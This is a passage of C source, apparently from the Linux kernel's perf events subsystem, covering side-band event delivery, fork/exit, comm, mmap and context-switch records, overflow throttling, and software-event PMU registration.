if (event->state < PERF_EVENT_STATE_INACTIVE)
continue;
if (!event_filter_match(event))
continue;
output(event, data);
}
}
/*
* Iterate all events that need to receive side-band events.
*
* For new callers: ensure that account_pmu_sb_event() includes
* your event, otherwise it might not get delivered.
*/
static void
perf_iterate_sb(perf_iterate_f output, void *data,
struct perf_event_context *task_ctx)
{
struct perf_event_context *ctx;
int ctxn;
rcu_read_lock();
preempt_disable();
/*
* If we have task_ctx != NULL we only notify the task context itself.
* The task_ctx is set only for EXIT events before releasing task
* context.
*/
if (task_ctx) {
perf_iterate_ctx(task_ctx, output, data, false);
goto done;
}
perf_iterate_sb_cpu(output, data);
for_each_task_context_nr(ctxn) {
ctx = rcu_dereference(current->perf_event_ctxp[ctxn]);
if (ctx)
perf_iterate_ctx(ctx, output, data, false);
}
done:
preempt_enable();
rcu_read_unlock();
}
/*
* Clear all file-based filters at exec, they'll have to be
* re-instated when/if these objects are mmapped again.
*/
static void perf_event_addr_filters_exec(struct perf_event *event, void *data)
{
struct perf_addr_filters_head *ifh = perf_event_addr_filters(event);
struct perf_addr_filter *filter;
unsigned int restart = 0, count = 0;
unsigned long flags;
if (!has_addr_filter(event))
return;
raw_spin_lock_irqsave(&ifh->lock, flags);
list_for_each_entry(filter, &ifh->list, entry) {
if (filter->inode) {
event->addr_filters_offs[count] = 0;
restart++;
}
count++;
}
if (restart)
event->addr_filters_gen++;
raw_spin_unlock_irqrestore(&ifh->lock, flags);
if (restart)
perf_event_stop(event, 1);
}
void perf_event_exec(void)
{
struct perf_event_context *ctx;
int ctxn;
rcu_read_lock();
for_each_task_context_nr(ctxn) {
ctx = current->perf_event_ctxp[ctxn];
if (!ctx)
continue;
perf_event_enable_on_exec(ctxn);
perf_iterate_ctx(ctx, perf_event_addr_filters_exec, NULL,
true);
}
rcu_read_unlock();
}
struct remote_output {
struct ring_buffer *rb;
int err;
};
static void __perf_event_output_stop(struct perf_event *event, void *data)
{
struct perf_event *parent = event->parent;
struct remote_output *ro = data;
struct ring_buffer *rb = ro->rb;
struct stop_event_data sd = {
.event = event,
};
if (!has_aux(event))
return;
if (!parent)
parent = event;
/*
* In case of inheritance, it will be the parent that links to the
* ring-buffer, but it will be the child that's actually using it.
*
* We are using event::rb to determine if the event should be stopped,
* however this may race with ring_buffer_attach() (through set_output),
* which will make us skip the event that actually needs to be stopped.
* So ring_buffer_attach() has to stop an aux event before re-assigning
* its rb pointer.
*/
if (rcu_dereference(parent->rb) == rb)
ro->err = __perf_event_stop(&sd);
}
static int __perf_pmu_output_stop(void *info)
{
struct perf_event *event = info;
struct pmu *pmu = event->pmu;
struct perf_cpu_context *cpuctx = this_cpu_ptr(pmu->pmu_cpu_context);
struct remote_output ro = {
.rb = event->rb,
};
rcu_read_lock();
perf_iterate_ctx(&cpuctx->ctx, __perf_event_output_stop, &ro, false);
if (cpuctx->task_ctx)
perf_iterate_ctx(cpuctx->task_ctx, __perf_event_output_stop,
&ro, false);
rcu_read_unlock();
return ro.err;
}
static void perf_pmu_output_stop(struct perf_event *event)
{
struct perf_event *iter;
int err, cpu;
restart:
rcu_read_lock();
list_for_each_entry_rcu(iter, &event->rb->event_list, rb_entry) {
/*
* For per-CPU events, we need to make sure that neither they
* nor their children are running; for cpu==-1 events it's
* sufficient to stop the event itself if it's active, since
* it can't have children.
*/
cpu = iter->cpu;
if (cpu == -1)
cpu = READ_ONCE(iter->oncpu);
if (cpu == -1)
continue;
err = cpu_function_call(cpu, __perf_pmu_output_stop, event);
if (err == -EAGAIN) {
rcu_read_unlock();
goto restart;
}
}
rcu_read_unlock();
}
/*
* task tracking -- fork/exit
*
* enabled by: attr.comm | attr.mmap | attr.mmap2 | attr.mmap_data | attr.task
*/
struct perf_task_event {
struct task_struct *task;
struct perf_event_context *task_ctx;
struct {
struct perf_event_header header;
u32 pid;
u32 ppid;
u32 tid;
u32 ptid;
u64 time;
} event_id;
};
static int perf_event_task_match(struct perf_event *event)
{
return event->attr.comm || event->attr.mmap ||
event->attr.mmap2 || event->attr.mmap_data ||
event->attr.task;
}
static void perf_event_task_output(struct perf_event *event,
void *data)
{
struct perf_task_event *task_event = data;
struct perf_output_handle handle;
struct perf_sample_data sample;
struct task_struct *task = task_event->task;
int ret, size = task_event->event_id.header.size;
if (!perf_event_task_match(event))
return;
perf_event_header__init_id(&task_event->event_id.header, &sample, event);
ret = perf_output_begin(&handle, event,
task_event->event_id.header.size);
if (ret)
goto out;
task_event->event_id.pid = perf_event_pid(event, task);
task_event->event_id.ppid = perf_event_pid(event, current);
task_event->event_id.tid = perf_event_tid(event, task);
task_event->event_id.ptid = perf_event_tid(event, current);
task_event->event_id.time = perf_event_clock(event);
perf_output_put(&handle, task_event->event_id);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
out:
task_event->event_id.header.size = size;
}
static void perf_event_task(struct task_struct *task,
struct perf_event_context *task_ctx,
int new)
{
struct perf_task_event task_event;
if (!atomic_read(&nr_comm_events) &&
!atomic_read(&nr_mmap_events) &&
!atomic_read(&nr_task_events))
return;
task_event = (struct perf_task_event){
.task = task,
.task_ctx = task_ctx,
.event_id = {
.header = {
.type = new ? PERF_RECORD_FORK : PERF_RECORD_EXIT,
.misc = 0,
.size = sizeof(task_event.event_id),
},
/* .pid */
/* .ppid */
/* .tid */
/* .ptid */
/* .time */
},
};
perf_iterate_sb(perf_event_task_output,
&task_event,
task_ctx);
}
void perf_event_fork(struct task_struct *task)
{
perf_event_task(task, NULL, 1);
}
/*
* comm tracking
*/
struct perf_comm_event {
struct task_struct *task;
char *comm;
int comm_size;
struct {
struct perf_event_header header;
u32 pid;
u32 tid;
} event_id;
};
static int perf_event_comm_match(struct perf_event *event)
{
return event->attr.comm;
}
static void perf_event_comm_output(struct perf_event *event,
void *data)
{
struct perf_comm_event *comm_event = data;
struct perf_output_handle handle;
struct perf_sample_data sample;
int size = comm_event->event_id.header.size;
int ret;
if (!perf_event_comm_match(event))
return;
perf_event_header__init_id(&comm_event->event_id.header, &sample, event);
ret = perf_output_begin(&handle, event,
comm_event->event_id.header.size);
if (ret)
goto out;
comm_event->event_id.pid = perf_event_pid(event, comm_event->task);
comm_event->event_id.tid = perf_event_tid(event, comm_event->task);
perf_output_put(&handle, comm_event->event_id);
__output_copy(&handle, comm_event->comm,
comm_event->comm_size);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
out:
comm_event->event_id.header.size = size;
}
static void perf_event_comm_event(struct perf_comm_event *comm_event)
{
char comm[TASK_COMM_LEN];
unsigned int size;
memset(comm, 0, sizeof(comm));
strlcpy(comm, comm_event->task->comm, sizeof(comm));
size = ALIGN(strlen(comm)+1, sizeof(u64));
comm_event->comm = comm;
comm_event->comm_size = size;
comm_event->event_id.header.size = sizeof(comm_event->event_id) + size;
perf_iterate_sb(perf_event_comm_output,
comm_event,
NULL);
}
void perf_event_comm(struct task_struct *task, bool exec)
{
struct perf_comm_event comm_event;
if (!atomic_read(&nr_comm_events))
return;
comm_event = (struct perf_comm_event){
.task = task,
/* .comm */
/* .comm_size */
.event_id = {
.header = {
.type = PERF_RECORD_COMM,
.misc = exec ? PERF_RECORD_MISC_COMM_EXEC : 0,
/* .size */
},
/* .pid */
/* .tid */
},
};
perf_event_comm_event(&comm_event);
}
/*
* mmap tracking
*/
struct perf_mmap_event {
struct vm_area_struct *vma;
const char *file_name;
int file_size;
int maj, min;
u64 ino;
u64 ino_generation;
u32 prot, flags;
struct {
struct perf_event_header header;
u32 pid;
u32 tid;
u64 start;
u64 len;
u64 pgoff;
} event_id;
};
static int perf_event_mmap_match(struct perf_event *event,
void *data)
{
struct perf_mmap_event *mmap_event = data;
struct vm_area_struct *vma = mmap_event->vma;
int executable = vma->vm_flags & VM_EXEC;
return (!executable && event->attr.mmap_data) ||
(executable && (event->attr.mmap || event->attr.mmap2));
}
static void perf_event_mmap_output(struct perf_event *event,
void *data)
{
struct perf_mmap_event *mmap_event = data;
struct perf_output_handle handle;
struct perf_sample_data sample;
int size = mmap_event->event_id.header.size;
int ret;
if (!perf_event_mmap_match(event, data))
return;
if (event->attr.mmap2) {
mmap_event->event_id.header.type = PERF_RECORD_MMAP2;
mmap_event->event_id.header.size += sizeof(mmap_event->maj);
mmap_event->event_id.header.size += sizeof(mmap_event->min);
mmap_event->event_id.header.size += sizeof(mmap_event->ino);
mmap_event->event_id.header.size += sizeof(mmap_event->ino_generation);
mmap_event->event_id.header.size += sizeof(mmap_event->prot);
mmap_event->event_id.header.size += sizeof(mmap_event->flags);
}
perf_event_header__init_id(&mmap_event->event_id.header, &sample, event);
ret = perf_output_begin(&handle, event,
mmap_event->event_id.header.size);
if (ret)
goto out;
mmap_event->event_id.pid = perf_event_pid(event, current);
mmap_event->event_id.tid = perf_event_tid(event, current);
perf_output_put(&handle, mmap_event->event_id);
if (event->attr.mmap2) {
perf_output_put(&handle, mmap_event->maj);
perf_output_put(&handle, mmap_event->min);
perf_output_put(&handle, mmap_event->ino);
perf_output_put(&handle, mmap_event->ino_generation);
perf_output_put(&handle, mmap_event->prot);
perf_output_put(&handle, mmap_event->flags);
}
__output_copy(&handle, mmap_event->file_name,
mmap_event->file_size);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
out:
mmap_event->event_id.header.size = size;
}
static void perf_event_mmap_event(struct perf_mmap_event *mmap_event)
{
struct vm_area_struct *vma = mmap_event->vma;
struct file *file = vma->vm_file;
int maj = 0, min = 0;
u64 ino = 0, gen = 0;
u32 prot = 0, flags = 0;
unsigned int size;
char tmp[16];
char *buf = NULL;
char *name;
if (vma->vm_flags & VM_READ)
prot |= PROT_READ;
if (vma->vm_flags & VM_WRITE)
prot |= PROT_WRITE;
if (vma->vm_flags & VM_EXEC)
prot |= PROT_EXEC;
if (vma->vm_flags & VM_MAYSHARE)
flags = MAP_SHARED;
else
flags = MAP_PRIVATE;
if (vma->vm_flags & VM_DENYWRITE)
flags |= MAP_DENYWRITE;
if (vma->vm_flags & VM_MAYEXEC)
flags |= MAP_EXECUTABLE;
if (vma->vm_flags & VM_LOCKED)
flags |= MAP_LOCKED;
if (vma->vm_flags & VM_HUGETLB)
flags |= MAP_HUGETLB;
if (file) {
struct inode *inode;
dev_t dev;
buf = kmalloc(PATH_MAX, GFP_KERNEL);
if (!buf) {
name = "//enomem";
goto cpy_name;
}
/*
* d_path() works from the end of the rb backwards, so we
* need to add enough zero bytes after the string to handle
* the 64bit alignment we do later.
*/
name = file_path(file, buf, PATH_MAX - sizeof(u64));
if (IS_ERR(name)) {
name = "//toolong";
goto cpy_name;
}
inode = file_inode(vma->vm_file);
dev = inode->i_sb->s_dev;
ino = inode->i_ino;
gen = inode->i_generation;
maj = MAJOR(dev);
min = MINOR(dev);
goto got_name;
} else {
if (vma->vm_ops && vma->vm_ops->name) {
name = (char *) vma->vm_ops->name(vma);
if (name)
goto cpy_name;
}
name = (char *)arch_vma_name(vma);
if (name)
goto cpy_name;
if (vma->vm_start <= vma->vm_mm->start_brk &&
vma->vm_end >= vma->vm_mm->brk) {
name = "[heap]";
goto cpy_name;
}
if (vma->vm_start <= vma->vm_mm->start_stack &&
vma->vm_end >= vma->vm_mm->start_stack) {
name = "[stack]";
goto cpy_name;
}
name = "//anon";
goto cpy_name;
}
cpy_name:
strlcpy(tmp, name, sizeof(tmp));
name = tmp;
got_name:
/*
* Since our buffer works in 8 byte units we need to align our string
* size to a multiple of 8. However, we must guarantee the tail end is
* zero'd out to avoid leaking random bits to userspace.
*/
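/*
 * E.g. (illustrative name): "a.out" occupies 6 bytes including its NUL,
 * so two additional zero bytes are appended to reach the 8-byte boundary.
 */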
size = strlen(name)+1;
while (!IS_ALIGNED(size, sizeof(u64)))
name[size++] = '\0';
mmap_event->file_name = name;
mmap_event->file_size = size;
mmap_event->maj = maj;
mmap_event->min = min;
mmap_event->ino = ino;
mmap_event->ino_generation = gen;
mmap_event->prot = prot;
mmap_event->flags = flags;
if (!(vma->vm_flags & VM_EXEC))
mmap_event->event_id.header.misc |= PERF_RECORD_MISC_MMAP_DATA;
mmap_event->event_id.header.size = sizeof(mmap_event->event_id) + size;
perf_iterate_sb(perf_event_mmap_output,
mmap_event,
NULL);
kfree(buf);
}
/*
* Check whether inode and address range match filter criteria.
*/
static bool perf_addr_filter_match(struct perf_addr_filter *filter,
struct file *file, unsigned long offset,
unsigned long size)
{
if (filter->inode != file_inode(file))
return false;
if (filter->offset > offset + size)
return false;
if (filter->offset + filter->size < offset)
return false;
return true;
}
static void __perf_addr_filters_adjust(struct perf_event *event, void *data)
{
struct perf_addr_filters_head *ifh = perf_event_addr_filters(event);
struct vm_area_struct *vma = data;
unsigned long off = vma->vm_pgoff << PAGE_SHIFT, flags;
struct file *file = vma->vm_file;
struct perf_addr_filter *filter;
unsigned int restart = 0, count = 0;
if (!has_addr_filter(event))
return;
if (!file)
return;
raw_spin_lock_irqsave(&ifh->lock, flags);
list_for_each_entry(filter, &ifh->list, entry) {
if (perf_addr_filter_match(filter, file, off,
vma->vm_end - vma->vm_start)) {
event->addr_filters_offs[count] = vma->vm_start;
restart++;
}
count++;
}
if (restart)
event->addr_filters_gen++;
raw_spin_unlock_irqrestore(&ifh->lock, flags);
if (restart)
perf_event_stop(event, 1);
}
/*
* Adjust all task's events' filters to the new vma
*/
static void perf_addr_filters_adjust(struct vm_area_struct *vma)
{
struct perf_event_context *ctx;
int ctxn;
/*
* Data tracing isn't supported yet and as such there is no need
* to keep track of anything that isn't related to executable code:
*/
if (!(vma->vm_flags & VM_EXEC))
return;
rcu_read_lock();
for_each_task_context_nr(ctxn) {
ctx = rcu_dereference(current->perf_event_ctxp[ctxn]);
if (!ctx)
continue;
perf_iterate_ctx(ctx, __perf_addr_filters_adjust, vma, true);
}
rcu_read_unlock();
}
void perf_event_mmap(struct vm_area_struct *vma)
{
struct perf_mmap_event mmap_event;
if (!atomic_read(&nr_mmap_events))
return;
mmap_event = (struct perf_mmap_event){
.vma = vma,
/* .file_name */
/* .file_size */
.event_id = {
.header = {
.type = PERF_RECORD_MMAP,
.misc = PERF_RECORD_MISC_USER,
/* .size */
},
/* .pid */
/* .tid */
.start = vma->vm_start,
.len = vma->vm_end - vma->vm_start,
.pgoff = (u64)vma->vm_pgoff << PAGE_SHIFT,
},
/* .maj (attr_mmap2 only) */
/* .min (attr_mmap2 only) */
/* .ino (attr_mmap2 only) */
/* .ino_generation (attr_mmap2 only) */
/* .prot (attr_mmap2 only) */
/* .flags (attr_mmap2 only) */
};
perf_addr_filters_adjust(vma);
perf_event_mmap_event(&mmap_event);
}
void perf_event_aux_event(struct perf_event *event, unsigned long head,
unsigned long size, u64 flags)
{
struct perf_output_handle handle;
struct perf_sample_data sample;
struct perf_aux_event {
struct perf_event_header header;
u64 offset;
u64 size;
u64 flags;
} rec = {
.header = {
.type = PERF_RECORD_AUX,
.misc = 0,
.size = sizeof(rec),
},
.offset = head,
.size = size,
.flags = flags,
};
int ret;
perf_event_header__init_id(&rec.header, &sample, event);
ret = perf_output_begin(&handle, event, rec.header.size);
if (ret)
return;
perf_output_put(&handle, rec);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
}
/*
* Lost/dropped samples logging
*/
void perf_log_lost_samples(struct perf_event *event, u64 lost)
{
struct perf_output_handle handle;
struct perf_sample_data sample;
int ret;
struct {
struct perf_event_header header;
u64 lost;
} lost_samples_event = {
.header = {
.type = PERF_RECORD_LOST_SAMPLES,
.misc = 0,
.size = sizeof(lost_samples_event),
},
.lost = lost,
};
perf_event_header__init_id(&lost_samples_event.header, &sample, event);
ret = perf_output_begin(&handle, event,
lost_samples_event.header.size);
if (ret)
return;
perf_output_put(&handle, lost_samples_event);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
}
/*
* context_switch tracking
*/
struct perf_switch_event {
struct task_struct *task;
struct task_struct *next_prev;
struct {
struct perf_event_header header;
u32 next_prev_pid;
u32 next_prev_tid;
} event_id;
};
static int perf_event_switch_match(struct perf_event *event)
{
return event->attr.context_switch;
}
static void perf_event_switch_output(struct perf_event *event, void *data)
{
struct perf_switch_event *se = data;
struct perf_output_handle handle;
struct perf_sample_data sample;
int ret;
if (!perf_event_switch_match(event))
return;
/* Only CPU-wide events are allowed to see next/prev pid/tid */
if (event->ctx->task) {
se->event_id.header.type = PERF_RECORD_SWITCH;
se->event_id.header.size = sizeof(se->event_id.header);
} else {
se->event_id.header.type = PERF_RECORD_SWITCH_CPU_WIDE;
se->event_id.header.size = sizeof(se->event_id);
se->event_id.next_prev_pid =
perf_event_pid(event, se->next_prev);
se->event_id.next_prev_tid =
perf_event_tid(event, se->next_prev);
}
perf_event_header__init_id(&se->event_id.header, &sample, event);
ret = perf_output_begin(&handle, event, se->event_id.header.size);
if (ret)
return;
if (event->ctx->task)
perf_output_put(&handle, se->event_id.header);
else
perf_output_put(&handle, se->event_id);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
}
static void perf_event_switch(struct task_struct *task,
struct task_struct *next_prev, bool sched_in)
{
struct perf_switch_event switch_event;
/* N.B. caller checks nr_switch_events != 0 */
switch_event = (struct perf_switch_event){
.task = task,
.next_prev = next_prev,
.event_id = {
.header = {
/* .type */
.misc = sched_in ? 0 : PERF_RECORD_MISC_SWITCH_OUT,
/* .size */
},
/* .next_prev_pid */
/* .next_prev_tid */
},
};
perf_iterate_sb(perf_event_switch_output,
&switch_event,
NULL);
}
/*
* IRQ throttle logging
*/
static void perf_log_throttle(struct perf_event *event, int enable)
{
struct perf_output_handle handle;
struct perf_sample_data sample;
int ret;
struct {
struct perf_event_header header;
u64 time;
u64 id;
u64 stream_id;
} throttle_event = {
.header = {
.type = PERF_RECORD_THROTTLE,
.misc = 0,
.size = sizeof(throttle_event),
},
.time = perf_event_clock(event),
.id = primary_event_id(event),
.stream_id = event->id,
};
if (enable)
throttle_event.header.type = PERF_RECORD_UNTHROTTLE;
perf_event_header__init_id(&throttle_event.header, &sample, event);
ret = perf_output_begin(&handle, event,
throttle_event.header.size);
if (ret)
return;
perf_output_put(&handle, throttle_event);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
}
static void perf_log_itrace_start(struct perf_event *event)
{
struct perf_output_handle handle;
struct perf_sample_data sample;
struct perf_aux_event {
struct perf_event_header header;
u32 pid;
u32 tid;
} rec;
int ret;
if (event->parent)
event = event->parent;
if (!(event->pmu->capabilities & PERF_PMU_CAP_ITRACE) ||
event->hw.itrace_started)
return;
rec.header.type = PERF_RECORD_ITRACE_START;
rec.header.misc = 0;
rec.header.size = sizeof(rec);
rec.pid = perf_event_pid(event, current);
rec.tid = perf_event_tid(event, current);
perf_event_header__init_id(&rec.header, &sample, event);
ret = perf_output_begin(&handle, event, rec.header.size);
if (ret)
return;
perf_output_put(&handle, rec);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
}
static int
__perf_event_account_interrupt(struct perf_event *event, int throttle)
{
struct hw_perf_event *hwc = &event->hw;
int ret = 0;
u64 seq;
seq = __this_cpu_read(perf_throttled_seq);
if (seq != hwc->interrupts_seq) {
hwc->interrupts_seq = seq;
hwc->interrupts = 1;
} else {
hwc->interrupts++;
if (unlikely(throttle
&& hwc->interrupts >= max_samples_per_tick)) {
__this_cpu_inc(perf_throttled_count);
tick_dep_set_cpu(smp_processor_id(), TICK_DEP_BIT_PERF_EVENTS);
hwc->interrupts = MAX_INTERRUPTS;
perf_log_throttle(event, 0);
ret = 1;
}
}
if (event->attr.freq) {
u64 now = perf_clock();
s64 delta = now - hwc->freq_time_stamp;
hwc->freq_time_stamp = now;
if (delta > 0 && delta < 2*TICK_NSEC)
perf_adjust_period(event, delta, hwc->last_period, true);
}
return ret;
}
int perf_event_account_interrupt(struct perf_event *event)
{
return __perf_event_account_interrupt(event, 1);
}
/*
* Generic event overflow handling, sampling.
*/
static int __perf_event_overflow(struct perf_event *event,
int throttle, struct perf_sample_data *data,
struct pt_regs *regs)
{
int events = atomic_read(&event->event_limit);
int ret = 0;
/*
* Non-sampling counters might still use the PMI to fold short
* hardware counters, ignore those.
*/
if (unlikely(!is_sampling_event(event)))
return 0;
ret = __perf_event_account_interrupt(event, throttle);
/*
* XXX event_limit might not quite work as expected on inherited
* events
*/
event->pending_kill = POLL_IN;
if (events && atomic_dec_and_test(&event->event_limit)) {
ret = 1;
event->pending_kill = POLL_HUP;
perf_event_disable_inatomic(event);
}
READ_ONCE(event->overflow_handler)(event, data, regs);
if (*perf_event_fasync(event) && event->pending_kill) {
event->pending_wakeup = 1;
irq_work_queue(&event->pending);
}
return ret;
}
int perf_event_overflow(struct perf_event *event,
struct perf_sample_data *data,
struct pt_regs *regs)
{
return __perf_event_overflow(event, 1, data, regs);
}
/*
* Generic software event infrastructure
*/
struct swevent_htable {
struct swevent_hlist *swevent_hlist;
struct mutex hlist_mutex;
int hlist_refcount;
/* Recursion avoidance in each contexts */
int recursion[PERF_NR_CONTEXTS];
};
static DEFINE_PER_CPU(struct swevent_htable, swevent_htable);
/*
* We directly increment event->count and keep a second value in
* event->hw.period_left to count intervals. This period event
* is kept in the range [-sample_period, 0] so that we can use the
* sign as trigger.
*/
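/*
 * Worked example (illustrative numbers): with a sample period of 100 and
 * period_left having climbed to 250, nr = (100 + 250) / 100 = 3 periods
 * have elapsed, so 3 is returned and period_left is rewound to
 * 250 - 3 * 100 = -50, i.e. 50 more counts until the next overflow.
 */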
u64 perf_swevent_set_period(struct perf_event *event)
{
struct hw_perf_event *hwc = &event->hw;
u64 period = hwc->last_period;
u64 nr, offset;
s64 old, val;
hwc->last_period = hwc->sample_period;
again:
old = val = local64_read(&hwc->period_left);
if (val < 0)
return 0;
nr = div64_u64(period + val, period);
offset = nr * period;
val -= offset;
if (local64_cmpxchg(&hwc->period_left, old, val) != old)
goto again;
return nr;
}
static void perf_swevent_overflow(struct perf_event *event, u64 overflow,
struct perf_sample_data *data,
struct pt_regs *regs)
{
struct hw_perf_event *hwc = &event->hw;
int throttle = 0;
if (!overflow)
overflow = perf_swevent_set_period(event);
if (hwc->interrupts == MAX_INTERRUPTS)
return;
for (; overflow; overflow--) {
if (__perf_event_overflow(event, throttle,
data, regs)) {
/*
* We inhibit the overflow from happening when
* hwc->interrupts == MAX_INTERRUPTS.
*/
break;
}
throttle = 1;
}
}
static void perf_swevent_event(struct perf_event *event, u64 nr,
struct perf_sample_data *data,
struct pt_regs *regs)
{
struct hw_perf_event *hwc = &event->hw;
local64_add(nr, &event->count);
if (!regs)
return;
if (!is_sampling_event(event))
return;
if ((event->attr.sample_type & PERF_SAMPLE_PERIOD) && !event->attr.freq) {
data->period = nr;
return perf_swevent_overflow(event, 1, data, regs);
} else
data->period = event->hw.last_period;
if (nr == 1 && hwc->sample_period == 1 && !event->attr.freq)
return perf_swevent_overflow(event, 1, data, regs);
if (local64_add_negative(nr, &hwc->period_left))
return;
perf_swevent_overflow(event, 0, data, regs);
}
static int perf_exclude_event(struct perf_event *event,
struct pt_regs *regs)
{
if (event->hw.state & PERF_HES_STOPPED)
return 1;
if (regs) {
if (event->attr.exclude_user && user_mode(regs))
return 1;
if (event->attr.exclude_kernel && !user_mode(regs))
return 1;
}
return 0;
}
static int perf_swevent_match(struct perf_event *event,
enum perf_type_id type,
u32 event_id,
struct perf_sample_data *data,
struct pt_regs *regs)
{
if (event->attr.type != type)
return 0;
if (event->attr.config != event_id)
return 0;
if (perf_exclude_event(event, regs))
return 0;
return 1;
}
static inline u64 swevent_hash(u64 type, u32 event_id)
{
u64 val = event_id | (type << 32);
return hash_64(val, SWEVENT_HLIST_BITS);
}
static inline struct hlist_head *
__find_swevent_head(struct swevent_hlist *hlist, u64 type, u32 event_id)
{
u64 hash = swevent_hash(type, event_id);
return &hlist->heads[hash];
}
/* For the read side: events when they trigger */
static inline struct hlist_head *
find_swevent_head_rcu(struct swevent_htable *swhash, u64 type, u32 event_id)
{
struct swevent_hlist *hlist;
hlist = rcu_dereference(swhash->swevent_hlist);
if (!hlist)
return NULL;
return __find_swevent_head(hlist, type, event_id);
}
/* For the event head insertion and removal in the hlist */
static inline struct hlist_head *
find_swevent_head(struct swevent_htable *swhash, struct perf_event *event)
{
struct swevent_hlist *hlist;
u32 event_id = event->attr.config;
u64 type = event->attr.type;
/*
* Event scheduling is always serialized against hlist allocation
* and release, which makes the protected version suitable here.
* The context lock guarantees that.
*/
hlist = rcu_dereference_protected(swhash->swevent_hlist,
lockdep_is_held(&event->ctx->lock));
if (!hlist)
return NULL;
return __find_swevent_head(hlist, type, event_id);
}
static void do_perf_sw_event(enum perf_type_id type, u32 event_id,
u64 nr,
struct perf_sample_data *data,
struct pt_regs *regs)
{
struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
struct perf_event *event;
struct hlist_head *head;
rcu_read_lock();
head = find_swevent_head_rcu(swhash, type, event_id);
if (!head)
goto end;
hlist_for_each_entry_rcu(event, head, hlist_entry) {
if (perf_swevent_match(event, type, event_id, data, regs))
perf_swevent_event(event, nr, data, regs);
}
end:
rcu_read_unlock();
}
DEFINE_PER_CPU(struct pt_regs, __perf_regs[4]);
int perf_swevent_get_recursion_context(void)
{
struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
return get_recursion_context(swhash->recursion);
}
EXPORT_SYMBOL_GPL(perf_swevent_get_recursion_context);
void perf_swevent_put_recursion_context(int rctx)
{
struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
put_recursion_context(swhash->recursion, rctx);
}
void ___perf_sw_event(u32 event_id, u64 nr, struct pt_regs *regs, u64 addr)
{
struct perf_sample_data data;
if (WARN_ON_ONCE(!regs))
return;
perf_sample_data_init(&data, addr, 0);
do_perf_sw_event(PERF_TYPE_SOFTWARE, event_id, nr, &data, regs);
}
void __perf_sw_event(u32 event_id, u64 nr, struct pt_regs *regs, u64 addr)
{
int rctx;
preempt_disable_notrace();
rctx = perf_swevent_get_recursion_context();
if (unlikely(rctx < 0))
goto fail;
___perf_sw_event(event_id, nr, regs, addr);
perf_swevent_put_recursion_context(rctx);
fail:
preempt_enable_notrace();
}
static void perf_swevent_read(struct perf_event *event)
{
}
static int perf_swevent_add(struct perf_event *event, int flags)
{
struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
struct hw_perf_event *hwc = &event->hw;
struct hlist_head *head;
if (is_sampling_event(event)) {
hwc->last_period = hwc->sample_period;
perf_swevent_set_period(event);
}
hwc->state = !(flags & PERF_EF_START);
head = find_swevent_head(swhash, event);
if (WARN_ON_ONCE(!head))
return -EINVAL;
hlist_add_head_rcu(&event->hlist_entry, head);
perf_event_update_userpage(event);
return 0;
}
static void perf_swevent_del(struct perf_event *event, int flags)
{
hlist_del_rcu(&event->hlist_entry);
}
static void perf_swevent_start(struct perf_event *event, int flags)
{
event->hw.state = 0;
}
static void perf_swevent_stop(struct perf_event *event, int flags)
{
event->hw.state = PERF_HES_STOPPED;
}
/* Deref the hlist from the update side */
static inline struct swevent_hlist *
swevent_hlist_deref(struct swevent_htable *swhash)
{
return rcu_dereference_protected(swhash->swevent_hlist,
lockdep_is_held(&swhash->hlist_mutex));
}
static void swevent_hlist_release(struct swevent_htable *swhash)
{
struct swevent_hlist *hlist = swevent_hlist_deref(swhash);
if (!hlist)
return;
RCU_INIT_POINTER(swhash->swevent_hlist, NULL);
kfree_rcu(hlist, rcu_head);
}
static void swevent_hlist_put_cpu(int cpu)
{
struct swevent_htable *swhash = &per_cpu(swevent_htable, cpu);
mutex_lock(&swhash->hlist_mutex);
if (!--swhash->hlist_refcount)
swevent_hlist_release(swhash);
mutex_unlock(&swhash->hlist_mutex);
}
static void swevent_hlist_put(void)
{
int cpu;
for_each_possible_cpu(cpu)
swevent_hlist_put_cpu(cpu);
}
static int swevent_hlist_get_cpu(int cpu)
{
struct swevent_htable *swhash = &per_cpu(swevent_htable, cpu);
int err = 0;
mutex_lock(&swhash->hlist_mutex);
if (!swevent_hlist_deref(swhash) && cpu_online(cpu)) {
struct swevent_hlist *hlist;
hlist = kzalloc(sizeof(*hlist), GFP_KERNEL);
if (!hlist) {
err = -ENOMEM;
goto exit;
}
rcu_assign_pointer(swhash->swevent_hlist, hlist);
}
swhash->hlist_refcount++;
exit:
mutex_unlock(&swhash->hlist_mutex);
return err;
}
static int swevent_hlist_get(void)
{
int err, cpu, failed_cpu;
get_online_cpus();
for_each_possible_cpu(cpu) {
err = swevent_hlist_get_cpu(cpu);
if (err) {
failed_cpu = cpu;
goto fail;
}
}
put_online_cpus();
return 0;
fail:
for_each_possible_cpu(cpu) {
if (cpu == failed_cpu)
break;
swevent_hlist_put_cpu(cpu);
}
put_online_cpus();
return err;
}
struct static_key perf_swevent_enabled[PERF_COUNT_SW_MAX];
static void sw_perf_event_destroy(struct perf_event *event)
{
u64 event_id = event->attr.config;
WARN_ON(event->parent);
static_key_slow_dec(&perf_swevent_enabled[event_id]);
swevent_hlist_put();
}
static int perf_swevent_init(struct perf_event *event)
{
u64 event_id = event->attr.config;
if (event->attr.type != PERF_TYPE_SOFTWARE)
return -ENOENT;
/*
* no branch sampling for software events
*/
if (has_branch_stack(event))
return -EOPNOTSUPP;
switch (event_id) {
case PERF_COUNT_SW_CPU_CLOCK:
case PERF_COUNT_SW_TASK_CLOCK:
return -ENOENT;
default:
break;
}
if (event_id >= PERF_COUNT_SW_MAX)
return -ENOENT;
if (!event->parent) {
int err;
err = swevent_hlist_get();
if (err)
return err;
static_key_slow_inc(&perf_swevent_enabled[event_id]);
event->destroy = sw_perf_event_destroy;
}
return 0;
}
static struct pmu perf_swevent = {
.task_ctx_nr = perf_sw_context,
.capabilities = PERF_PMU_CAP_NO_NMI,
.event_init = perf_swevent_init,
.add = perf_swevent_add,
